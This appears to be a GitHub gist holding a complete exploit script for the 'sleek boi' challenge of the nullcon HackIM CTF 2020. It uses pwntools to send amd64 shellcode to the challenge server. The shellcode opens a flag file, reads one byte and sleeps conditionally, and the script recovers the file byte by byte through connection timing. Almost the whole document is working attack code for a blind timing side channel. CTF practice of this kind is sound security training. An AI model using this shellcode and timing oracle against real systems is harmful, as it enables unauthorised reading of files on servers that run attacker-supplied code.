@KaoRz
Created February 9, 2020 04:06
sleek boi script - nullcon HackIM CTF 2020
import sys
import time

from pwn import *
# Assemble payloads for 64-bit x86 and point the script at the challenge service.
context.update(arch="amd64")
HOST, PORT = "pwn4.ctf.nullcon.net", 5003
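def screen_clean():
    """Erase the previous terminal line so progress output is updated in place.

    Writes the ANSI "cursor up one line" (ESC[F) and "erase to end of line"
    (ESC[K) sequences to stdout, then flushes so the sequences take effect
    immediately instead of sitting in the stdout buffer until the next
    newline is written.
    """
    sys.stdout.write("\033[F")
    sys.stdout.write("\033[K")
    sys.stdout.flush()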
def send_shellcode(io, offset, limit_intval):
    """Assemble the one-byte timing-oracle payload and send it down ``io``.

    The amd64 payload opens ``flag`` (the string is pushed onto the stack),
    lseek()s to ``offset``, read()s a single byte onto the stack and compares
    it with ``limit_intval`` using a signed compare. When the byte is below
    the limit it jumps over the sleep; otherwise it performs a nanosleep with a
    timespec of {3, 0} first. Either way execution then runs into the trailing
    ``nop`` and past the end of the payload (presumably terminating the
    remote process). The caller turns "did the connection live longer than
    3 seconds" into one bit of a binary search.

    Args:
        io: an open pwntools tube to the challenge service.
        offset: file offset of the byte under test (filled into the ``%d``
            of the lseek argument).
        limit_intval: comparison threshold, expected in 0..127 (filled into
            the ``%d`` of the ``cmp``).
    """
    template = """
push 0x67616c66
mov rax, 2
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
syscall
push rax
mov rdi, rax
mov rax, 8
mov rsi, %d
mov rdx, 0
syscall
pop rdi
mov rax, 0
sub rsp, 8
mov rsi, rsp
mov rdx, 0x1
syscall
mov al, byte ptr [rsp]
cmp al, %d
jl crash
hit:
push 0
push 3
mov rdi, rsp
xor rsi, rsi
mov rax, 35
syscall
crash:
nop
"""
    asm_source = template % (offset, limit_intval)
    payload = asm(asm_source)
    io.sendline(payload)
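def bruteforce_char(offset):
    """Recover the flag byte at ``offset`` with a binary search over 0..127.

    Each probe opens a fresh connection, sends the timing-oracle payload with
    the current midpoint as threshold and waits for the connection to drop.
    A wait longer than the 3-second nanosleep built into the payload means
    the remote byte is >= the midpoint, so the lower bound moves up;
    otherwise the upper bound moves down. The 128-wide interval needs seven
    halvings to become one wide plus a final confirming probe, hence eight
    rounds; the last midpoint probed is the recovered byte.

    Args:
        offset: byte index into the remote file being recovered.

    Returns:
        The recovered byte as a one-character string.
    """
    sleep_threshold = 3.0  # seconds; must match the timespec in the payload
    base_limit = 0
    top_limit = 128
    for _ in range(8):
        io = remote(HOST, PORT)
        screen_clean()
        # Integer midpoint; ``//`` avoids the float result of ``/`` on Python 3.
        curr_limit = (top_limit + base_limit) // 2
        try:
            send_shellcode(io, offset, curr_limit)
            start = time.time()
            try:
                io.recv()
            except EOFError:
                # The remote process dies once the payload runs off its end;
                # the EOF is the expected end of a probe, not an error.
                pass
            elapsed = time.time() - start
        finally:
            # Close the socket even when send/recv raises something other
            # than EOFError (e.g. a timeout), so probes never leak connections.
            io.close()
        if elapsed > sleep_threshold:
            base_limit = curr_limit
        else:
            top_limit = curr_limit
        log.info("Current character --> %s (%d, %d)"
                 % (chr(curr_limit), base_limit, top_limit))
    screen_clean()
    log.success("Char found --> " + chr(curr_limit))
    return chr(curr_limit)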
# Recover the flag one byte at a time until the closing brace shows up.
flag = ""
cnt = 0
while True:
    flag += bruteforce_char(cnt)
    cnt += 1
    log.info("Progress --> " + flag)
    if "}" in flag:
        break
log.success("FLAG --> " + flag)
# [+] FLAG --> hackim20{OMG_The_first_one_was_unintended}